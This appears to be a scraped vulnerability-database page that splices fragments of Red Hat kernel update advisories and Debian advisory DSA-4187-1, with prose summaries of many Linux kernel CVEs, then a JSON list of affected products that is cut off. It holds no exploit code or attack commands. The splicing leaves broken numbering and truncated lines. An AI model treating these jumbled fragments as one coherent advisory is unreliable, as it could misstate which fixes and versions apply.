Source: kernel-2.6.32-696.28.1.el6.src.rpm

i386: kernel-2.6.32-696.28.1.el6.i686.rpm kernel-debug-2.6.32-696.28.1.el6.i686.rpm kernel-debug-debuginfo-2.6.32-696.28.1.el6.i686.rpm kernel-debug-devel-2.6.32-696.28.1.el6.i686.rpm kernel-debuginfo-2.6.32-696.28.1.el6.i686.rpm kernel-debuginfo-common-i686-2.6.32-696.28.1.el6.i686.rpm kernel-devel-2.6.32-696.28.1.el6.i686.rpm kernel-headers-2.6.32-696.28.1.el6.i686.rpm perf-2.6.32-696.28.1.el6.i686.rpm perf-debuginfo-2.6.32-696.28.1.el6.i686.rpm python-perf-debuginfo-2.6.32-696.28.1.el6.i686.rpm

noarch: kernel-abi-whitelists-2.6.32-696.28.1.el6.noarch.rpm kernel-doc-2.6.32-696.28.1.el6.noarch.rpm kernel-firmware-2.6.32-696.28.1.el6.noarch.rpm

ppc64: kernel-2.6.32-696.28.1.el6.ppc64.rpm kernel-bootwrapper-2.6.32-696.28.1.el6.ppc64.rpm kernel-debug-2.6.32-696.28.1.el6.ppc64.rpm kernel-debug-debuginfo-2.6.32-696.28.1.el6.ppc64.rpm kernel-debug-devel-2.6.32-696.28.1.el6.ppc64.rpm kernel-debuginfo-2.6.32-696.28.1.el6.ppc64.rpm kernel-debuginfo-common-ppc64-2.6.32-696.28.1.el6.ppc64.rpm kernel-devel-2.6.32-696.28.1.el6.ppc64.rpm kernel-headers-2.6.32-696.28.1.el6.ppc64.rpm perf-2.6.32-696.28.1.el6.ppc64.rpm perf-debuginfo-2.6.32-696.28.1.el6.ppc64.rpm python-perf-debuginfo-2.6.32-696.28.1.el6.ppc64.rpm

s390x: kernel-2.6.32-696.28.1.el6.s390x.rpm kernel-debug-2.6.32-696.28.1.el6.s390x.rpm kernel-debug-debuginfo-2.6.32-696.28.1.el6.s390x.rpm kernel-debug-devel-2.6.32-696.28.1.el6.s390x.rpm kernel-debuginfo-2.6.32-696.28.1.el6.s390x.rpm kernel-debuginfo-common-s390x-2.6.32-696.28.1.el6.s390x.rpm kernel-devel-2.6.32-696.28.1.el6.s390x.rpm kernel-headers-2.6.32-696.28.1.el6.s390x.rpm kernel-kdump-2.6.32-696.28.1.el6.s390x.rpm kernel-kdump-debuginfo-2.6.32-696.28.1.el6.s390x.rpm kernel-kdump-devel-2.6.32-696.28.1.el6.s390x.rpm perf-2.6.32-696.28.1.el6.s390x.rpm perf-debuginfo-2.6.32-696.28.1.el6.s390x.rpm python-perf-debuginfo-2.6.32-696.28.1.el6.s390x.rpm

x86_64: kernel-2.6.32-696.28.1.el6.x86_64.rpm kernel-debug-2.6.32-696.28.1.el6.x86_64.rpm kernel-debug-debuginfo-2.6.32-696.28.1.el6.i686.rpm kernel-debug-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm kernel-debug-devel-2.6.32-696.28.1.el6.i686.rpm kernel-debug-devel-2.6.32-696.28.1.el6.x86_64.rpm kernel-debuginfo-2.6.32-696.28.1.el6.i686.rpm kernel-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm kernel-debuginfo-common-i686-2.6.32-696.28.1.el6.i686.rpm kernel-debuginfo-common-x86_64-2.6.32-696.28.1.el6.x86_64.rpm kernel-devel-2.6.32-696.28.1.el6.x86_64.rpm kernel-headers-2.6.32-696.28.1.el6.x86_64.rpm perf-2.6.32-696.28.1.el6.x86_64.rpm perf-debuginfo-2.6.32-696.28.1.el6.i686.rpm perf-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm python-perf-debuginfo-2.6.32-696.28.1.el6.i686.rpm python-perf-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm

Red Hat Enterprise Linux Server Optional (v. 6):

i386: kernel-debug-debuginfo-2.6.32-696.28.1.el6.i686.rpm kernel-debuginfo-2.6.32-696.28.1.el6.i686.rpm kernel-debuginfo-common-i686-2.6.32-696.28.1.el6.i686.rpm perf-debuginfo-2.6.32-696.28.1.el6.i686.rpm python-perf-2.6.32-696.28.1.el6.i686.rpm python-perf-debuginfo-2.6.32-696.28.1.el6.i686.rpm

ppc64: kernel-debug-debuginfo-2.6.32-696.28.1.el6.ppc64.rpm kernel-debuginfo-2.6.32-696.28.1.el6.ppc64.rpm kernel-debuginfo-common-ppc64-2.6.32-696.28.1.el6.ppc64.rpm perf-debuginfo-2.6.32-696.28.1.el6.ppc64.rpm python-perf-2.6.32-696.28.1.el6.ppc64.rpm python-perf-debuginfo-2.6.32-696.28.1.el6.ppc64.rpm

s390x: kernel-debug-debuginfo-2.6.32-696.28.1.el6.s390x.rpm kernel-debuginfo-2.6.32-696.28.1.el6.s390x.rpm kernel-debuginfo-common-s390x-2.6.32-696.28.1.el6.s390x.rpm kernel-kdump-debuginfo-2.6.32-696.28.1.el6.s390x.rpm perf-debuginfo-2.6.32-696.28.1.el6.s390x.rpm python-perf-2.6.32-696.28.1.el6.s390x.rpm python-perf-debuginfo-2.6.32-696.28.1.el6.s390x.rpm

x86_64: kernel-debug-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm kernel-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm kernel-debuginfo-common-x86_64-2.6.32-696.28.1.el6.x86_64.rpm perf-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm python-perf-2.6.32-696.28.1.el6.x86_64.rpm python-perf-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm

Red Hat Enterprise Linux Workstation (v. 6):

Source: kernel-2.6.32-696.28.1.el6.src.rpm

i386: kernel-2.6.32-696.28.1.el6.i686.rpm kernel-debug-2.6.32-696.28.1.el6.i686.rpm kernel-debug-debuginfo-2.6.32-696.28.1.el6.i686.rpm kernel-debug-devel-2.6.32-696.28.1.el6.i686.rpm kernel-debuginfo-2.6.32-696.28.1.el6.i686.rpm kernel-debuginfo-common-i686-2.6.32-696.28.1.el6.i686.rpm kernel-devel-2.6.32-696.28.1.el6.i686.rpm kernel-headers-2.6.32-696.28.1.el6.i686.rpm perf-2.6.32-696.28.1.el6.i686.rpm perf-debuginfo-2.6.32-696.28.1.el6.i686.rpm python-perf-debuginfo-2.6.32-696.28.1.el6.i686.rpm

noarch: kernel-abi-whitelists-2.6.32-696.28.1.el6.noarch.rpm kernel-doc-2.6.32-696.28.1.el6.noarch.rpm kernel-firmware-2.6.32-696.28.1.el6.noarch.rpm

x86_64: kernel-2.6.32-696.28.1.el6.x86_64.rpm kernel-debug-2.6.32-696.28.1.el6.x86_64.rpm kernel-debug-debuginfo-2.6.32-696.28.1.el6.i686.rpm kernel-debug-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm kernel-debug-devel-2.6.32-696.28.1.el6.i686.rpm kernel-debug-devel-2.6.32-696.28.1.el6.x86_64.rpm kernel-debuginfo-2.6.32-696.28.1.el6.i686.rpm kernel-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm kernel-debuginfo-common-i686-2.6.32-696.28.1.el6.i686.rpm kernel-debuginfo-common-x86_64-2.6.32-696.28.1.el6.x86_64.rpm kernel-devel-2.6.32-696.28.1.el6.x86_64.rpm kernel-headers-2.6.32-696.28.1.el6.x86_64.rpm perf-2.6.32-696.28.1.el6.x86_64.rpm perf-debuginfo-2.6.32-696.28.1.el6.i686.rpm perf-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm python-perf-debuginfo-2.6.32-696.28.1.el6.i686.rpm python-perf-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm

Red Hat Enterprise Linux Workstation Optional (v. 6):

i386: kernel-debug-debuginfo-2.6.32-696.28.1.el6.i686.rpm kernel-debuginfo-2.6.32-696.28.1.el6.i686.rpm kernel-debuginfo-common-i686-2.6.32-696.28.1.el6.i686.rpm perf-debuginfo-2.6.32-696.28.1.el6.i686.rpm python-perf-2.6.32-696.28.1.el6.i686.rpm python-perf-debuginfo-2.6.32-696.28.1.el6.i686.rpm

x86_64: kernel-debug-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm kernel-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm kernel-debuginfo-common-x86_64-2.6.32-696.28.1.el6.x86_64.rpm perf-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm python-perf-2.6.32-696.28.1.el6.x86_64.rpm python-perf-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm

These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/

  1. References:

https://access.redhat.com/security/cve/CVE-2017-7645 https://access.redhat.com/security/cve/CVE-2017-8824 https://access.redhat.com/security/cve/CVE-2017-13166 https://access.redhat.com/security/cve/CVE-2017-18017 https://access.redhat.com/security/cve/CVE-2017-1000410 https://access.redhat.com/security/cve/CVE-2018-8897 https://access.redhat.com/security/updates/classification/#important https://access.redhat.com/articles/3431591

  1. Contact:

The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/

Copyright 2018 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1

iD8DBQFa8fO8XlSAg2UNWIIRAnN0AKCBdjdw1bC12xju0GwoOedA1L8osACaA1Ze 4IKrbiFeHd+C9bqCjUFX4pw= =3psi -----END PGP SIGNATURE-----

-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce .

Security Fix(es):

  • An industry-wide issue was found in the way many modern microprocessor designs have implemented speculative execution of Load & Store instructions (a commonly used performance optimization). It relies on the presence of a precisely-defined instruction sequence in the privileged code as well as the fact that memory read from address to which a recent memory write has occurred may see an older value and subsequently cause an update into the microprocessor's data cache even for speculatively executed instructions that never actually commit (retire). As a result, an unprivileged attacker could use this flaw to read privileged memory by conducting targeted cache side-channel attacks. (CVE-2018-3639)

Note: This issue is present in hardware and cannot be fully fixed via software update. To be fully functional, up-to-date CPU microcode applied on the system might be required. Please refer to References section for further information about this issue, CPU microcode requirements and the potential performance impact.

In this update, mitigation for PowerPC architecture is provided. Bugs fixed (https://bugzilla.redhat.com/):

1531135 - CVE-2017-18017 kernel: netfilter: use-after-free in tcpmss_mangle_packet function in net/netfilter/xt_TCPMSS.c 1566890 - CVE-2018-3639 hw: cpu: speculative store bypass

  1. (BZ#1549731)

  2. Intel Core X-Series (Skylake) processors use a hardcoded Time Stamp Counter (TSC) frequency of 25 MHz. In some cases this can be imprecise and lead to timing-related problems such as time drift, timers being triggered early, or TSC clock instability. This update mitigates these problems by no longer using the "native_calibrate_tsc()" function to define the TSC frequency. Refined calibration is now used to update the clock rate accordingly in these cases. (BZ#1547854)

  3. 7) - noarch, x86_64

  4. Description:

The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512


Debian Security Advisory DSA-4187-1 security@debian.org https://www.debian.org/security/ Ben Hutchings May 01, 2018 https://www.debian.org/security/faq


Package : linux CVE ID : CVE-2015-9016 CVE-2017-0861 CVE-2017-5715 CVE-2017-5753 CVE-2017-13166 CVE-2017-13220 CVE-2017-16526 CVE-2017-16911 CVE-2017-16912 CVE-2017-16913 CVE-2017-16914 CVE-2017-18017 CVE-2017-18203 CVE-2017-18216 CVE-2017-18232 CVE-2017-18241 CVE-2018-1066 CVE-2018-1068 CVE-2018-1092 CVE-2018-5332 CVE-2018-5333 CVE-2018-5750 CVE-2018-5803 CVE-2018-6927 CVE-2018-7492 CVE-2018-7566 CVE-2018-7740 CVE-2018-7757 CVE-2018-7995 CVE-2018-8781 CVE-2018-8822 CVE-2018-1000004 CVE-2018-1000199

Several vulnerabilities have been discovered in the Linux kernel that may lead to a privilege escalation, denial of service or information leaks.

CVE-2015-9016

Ming Lei reported a race condition in the multiqueue block layer
(blk-mq).  On a system with a driver using blk-mq (mtip32xx,
null_blk, or virtio_blk), a local user might be able to use this
for denial of service or possibly for privilege escalation.

CVE-2017-0861

Robb Glasser reported a potential use-after-free in the ALSA (sound)
PCM core.  We believe this was not possible in practice.

CVE-2017-5715

Multiple researchers have discovered a vulnerability in various
processors supporting speculative execution, enabling an attacker
controlling an unprivileged process to read memory from arbitrary
addresses, including from the kernel and all other processes
running on the system.

This specific attack has been named Spectre variant 2 (branch
target injection) and is mitigated for the x86 architecture (amd64
and i386) by using the "retpoline" compiler feature which allows
indirect branches to be isolated from speculative execution.

CVE-2017-5753

Multiple researchers have discovered a vulnerability in various
processors supporting speculative execution, enabling an attacker
controlling an unprivileged process to read memory from arbitrary
addresses, including from the kernel and all other processes
running on the system.

This specific attack has been named Spectre variant 1
(bounds-check bypass) and is mitigated by identifying vulnerable
code sections (array bounds checking followed by array access) and
replacing the array access with the speculation-safe
array_index_nospec() function.

More use sites will be added over time.

CVE-2017-13166

A bug in the 32-bit compatibility layer of the v4l2 ioctl handling
code has been found. Memory protections ensuring user-provided
buffers always point to userland memory were disabled, allowing
destination addresses to be in kernel space. On a 64-bit kernel a
local user with access to a suitable video device can exploit this
to overwrite kernel memory, leading to privilege escalation.

CVE-2017-13220

Al Viro reported that the Bluetooth HIDP implementation could
dereference a pointer before performing the necessary type check. 
A local user could use this to cause a denial of service.

CVE-2017-16526

Andrey Konovalov reported that the UWB subsystem may dereference
an invalid pointer in an error case.  A local user might be able
to use this for denial of service.

CVE-2017-16911

Secunia Research reported that the USB/IP vhci_hcd driver exposed
kernel heap addresses to local users.  This information could aid the
exploitation of other vulnerabilities.

CVE-2017-16912

Secunia Research reported that the USB/IP stub driver failed to
perform a range check on a received packet header field, leading
to an out-of-bounds read.  A remote user able to connect to the
USB/IP server could use this for denial of service.

CVE-2017-16913

Secunia Research reported that the USB/IP stub driver failed to
perform a range check on a received packet header field, leading
to excessive memory allocation.  A remote user able to connect to
the USB/IP server could use this for denial of service.

CVE-2017-16914

Secunia Research reported that the USB/IP stub driver failed to
check for an invalid combination of fields in a received packet,
leading to a null pointer dereference.  A remote user able to
connect to the USB/IP server could use this for denial of service.

CVE-2017-18017

Denys Fedoryshchenko reported that the netfilter xt_TCPMSS module
failed to validate TCP header lengths, potentially leading to a
use-after-free.  If this module is loaded, it could be used by a
remote attacker for denial of service or possibly for code
execution.

CVE-2017-18203

Hou Tao reported that there was a race condition in creation and
deletion of device-mapper (DM) devices.  A local user could
potentially use this for denial of service.

CVE-2017-18216

Alex Chen reported that the OCFS2 filesystem failed to hold a
necessary lock during nodemanager sysfs file operations,
potentially leading to a null pointer dereference.  A local user
could use this for denial of service.

CVE-2017-18232

Jason Yan reported a race condition in the SAS (Serial-Attached
SCSI) subsystem, between probing and destroying a port.  This
could lead to a deadlock.

CVE-2017-18241

Yunlei He reported that the f2fs implementation does not properly
initialise its state if the "noflush_merge" mount option is used. 
A local user with access to a filesystem mounted with this option
could use this to cause a denial of service.

CVE-2018-1066

Dan Aloni reported to Red Hat that the CIFS client implementation
would dereference a null pointer if the server sent an invalid
response during NTLMSSP setup negotiation.  This could be used
by a malicious server for denial of service.

CVE-2018-1068

The syzkaller tool found that the 32-bit compatibility layer of
ebtables did not sufficiently validate offset values. On a 64-bit
kernel, a local user with the CAP_NET_ADMIN capability (in any user
namespace) could use this to overwrite kernel memory, possibly
leading to privilege escalation. Debian disables unprivileged user
namespaces by default.

CVE-2018-1092

Wen Xu reported that a crafted ext4 filesystem image would
trigger a null dereference when mounted.  A local user able
to mount arbitrary filesystems could use this for denial of
service.

CVE-2018-5332

Mohamed Ghannam reported that the RDS protocol did not
sufficiently validate RDMA requests, leading to an out-of-bounds
write.  A local attacker on a system with the rds module loaded
could use this for denial of service or possibly for privilege
escalation.

CVE-2018-5333

Mohamed Ghannam reported that the RDS protocol did not properly
handle an error case, leading to a null pointer dereference.  A
local attacker on a system with the rds module loaded could
possibly use this for denial of service.

CVE-2018-5750

Wang Qize reported that the ACPI sbshc driver logged a kernel heap
address.  This information could aid the exploitation of other
vulnerabilities.

CVE-2018-5803

Alexey Kodanev reported that the SCTP protocol did not range-check
the length of chunks to be created.  A local or remote user could
use this to cause a denial of service.

CVE-2018-6927

Li Jinyue reported that the FUTEX_REQUEUE operation on futexes did
not check for negative parameter values, which might lead to a
denial of service or other security impact.

CVE-2018-7492

The syzkaller tool found that the RDS protocol was lacking a null
pointer check.  A local attacker on a system with the rds module
loaded could use this for denial of service.

CVE-2018-7566

Fan LongFei reported a race condition in the ALSA (sound)
sequencer core, between write and ioctl operations.  This could
lead to an out-of-bounds access or use-after-free.  A local user
with access to a sequencer device could use this for denial of
service or possibly for privilege escalation.

CVE-2018-7740

Nic Losby reported that the hugetlbfs filesystem's mmap operation
did not properly range-check the file offset.  A local user with
access to files on a hugetlbfs filesystem could use this to cause
a denial of service.

CVE-2018-7757

Jason Yan reported a memory leak in the SAS (Serial-Attached
SCSI) subsystem.  A local user on a system with SAS devices
could use this to cause a denial of service.

CVE-2018-7995

Seunghun Han reported a race condition in the x86 MCE
(Machine Check Exception) driver.  This is unlikely to have
any security impact.

CVE-2018-8781

Eyal Itkin reported that the udl (DisplayLink) driver's mmap
operation did not properly range-check the file offset.  A local
user with access to a udl framebuffer device could exploit this to
overwrite kernel memory, leading to privilege escalation.

CVE-2018-8822

Dr Silvio Cesare of InfoSect reported that the ncpfs client
implementation did not validate reply lengths from the server.  An
ncpfs server could use this to cause a denial of service or
remote code execution in the client.

CVE-2018-1000004

Luo Quan reported a race condition in the ALSA (sound) sequencer
core, between multiple ioctl operations.  This could lead to a
deadlock or use-after-free.  A local user with access to a
sequencer device could use this for denial of service or possibly
for privilege escalation.

CVE-2018-1000199

Andy Lutomirski discovered that the ptrace subsystem did not
sufficiently validate hardware breakpoint settings.  Local users
can use this to cause a denial of service, or possibly for
privilege escalation, on x86 (amd64 and i386) and possibly other
architectures.

For the oldstable distribution (jessie), these problems have been fixed in version 3.16.56-1.

We recommend that you upgrade your linux packages.

For the detailed security status of linux please refer to its security tracker page at: https://security-tracker.debian.org/tracker/linux

Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org -----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAlron61fFIAAAAAALgAo aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2 NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND z0Rtqw//Xf/L4bP65wU9M59Ef6xBt+Eph+yxeMsioGhu80ODdMemlmHzASMtfZjY AXxyt9l8lbHn8MmwDA4aLhhwHYXwvKATdpHSy1SILrRfb4s9P9uV1vsHaIeZ649E hDyNon9hP2tPso6BwqiYHZZy9Xxtd+T8vTBeBZwUKOLBkBRvV/gyNSUdJWp6L8WH aF4D1hHl9ZotDkyIvkubbx77aqbJ88I4R0n69x7L9udFbuXa+U7hV6dJdnpzyl/7 OukJfEtnkaUgWu0MdOfFss6iH5OQISn/y/ricRi29oKQiEp3YwnT5J9pFwSQeJJS H8ABVt251UoS0J+of3QWw0muOT/6UAF8SNpPKMJXC7Euq8pTmYVPSIeUYf4eqn65 UHZSCKXaszItq+uzVNYdkj504BJ4cG1lFxZtlrFWwKE8p7QOETN0GKvTRdu/SvDd Hl2nb4HouLpBYS518Th2/MGgzhXXAuO12MH3smenptZbqxKn9Z0XSTJYzFupgJk/ kKF2xkDFBE4toTLVE+6XdUKwYk4vkeDZyOGOwRYThSkKAzrUh5zThgal4HnknD2A 5ye4XLhjgSIT47/nmor6lhxd7WGXGkV33GF0azYlHr/sclfzxcU2Ev3NUBWQ8M3s CxfIO0FNCzO0WIUf40md7MlIAnDBIRGyYgNIIe7AnSRKKPykEx8= =wNQS -----END PGP SIGNATURE----- . SchAPnherr (Amazon) for reporting CVE-2017-1000252; and Armis Labs for reporting CVE-2017-1000410

Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201801-1708",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "linux enterprise debuginfo",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "suse",
        "version": "11"
      },
      {
        "model": "linux enterprise module for public cloud",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "suse",
        "version": "12"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.2"
      },
      {
        "model": "mrg realtime",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "2.0"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.5"
      },
      {
        "model": "arx",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "6.2.0"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "3.17"
      },
      {
        "model": "linux enterprise point of sale",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "suse",
        "version": "11"
      },
      {
        "model": "enterprise linux eus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.3"
      },
      {
        "model": "enterprise linux server tus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.7"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "3.10.108"
      },
      {
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "12.04"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.9.36"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.10"
      },
      {
        "model": "enterprise linux server aus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.6"
      },
      {
        "model": "enterprise linux desktop",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.0"
      },
      {
        "model": "enterprise linux server aus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.4"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "3.19"
      },
      {
        "model": "linux enterprise desktop",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "suse",
        "version": "12"
      },
      {
        "model": "enterprise linux server",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "6.0"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "debian",
        "version": "7.0"
      },
      {
        "model": "linux enterprise real time extension",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "suse",
        "version": "11"
      },
      {
        "model": "enterprise linux for real time",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7"
      },
      {
        "model": "linux enterprise real time extension",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "suse",
        "version": "12"
      },
      {
        "model": "eos",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "arista",
        "version": "4.20.1fx-virtual-router"
      },
      {
        "model": "enterprise linux server tus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.3"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "3.18.60"
      },
      {
        "model": "enterprise linux eus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.6"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.4.76"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "3.11"
      },
      {
        "model": "enterprise linux eus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.4"
      },
      {
        "model": "openstack cloud",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "suse",
        "version": "6"
      },
      {
        "model": "linux enterprise software development kit",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "suse",
        "version": "11"
      },
      {
        "model": "linux enterprise software development kit",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "suse",
        "version": "12"
      },
      {
        "model": "enterprise linux workstation",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "6.0"
      },
      {
        "model": "cloud magnum orchestration",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openstack",
        "version": "7"
      },
      {
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "14.04"
      },
      {
        "model": "enterprise linux server aus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.3"
      },
      {
        "model": "enterprise linux server tus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.6"
      },
      {
        "model": "linux enterprise high availability extension",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "suse",
        "version": "11"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "3.2"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.11"
      },
      {
        "model": "arx",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "6.4.0"
      },
      {
        "model": "linux enterprise workstation extension",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "suse",
        "version": "12"
      },
      {
        "model": "enterprise linux server",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.0"
      },
      {
        "model": "linux enterprise live patching",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "suse",
        "version": "12"
      },
      {
        "model": "enterprise linux server aus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.7"
      },
      {
        "model": "enterprise linux server tus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.4"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "3.3"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "3.2.99"
      },
      {
        "model": "leap",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "opensuse",
        "version": "42.3"
      },
      {
        "model": "enterprise linux for real time for nfv",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7"
      },
      {
        "model": "enterprise linux workstation",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.0"
      },
      {
        "model": "caas platform",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "suse",
        "version": "*"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "3.16.54"
      },
      {
        "model": "enterprise linux desktop",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "6.0"
      },
      {
        "model": "linux enterprise high availability",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "suse",
        "version": "12"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "debian",
        "version": "8.0"
      },
      {
        "model": "enterprise linux eus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.7"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.1.43"
      },
      {
        "model": "linux enterprise server",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "suse",
        "version": "11"
      },
      {
        "model": "linux enterprise server",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "suse",
        "version": "12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "linux",
        "version": "4.10.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "linux",
        "version": "4.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "linux",
        "version": "4.10.15"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 0.8,
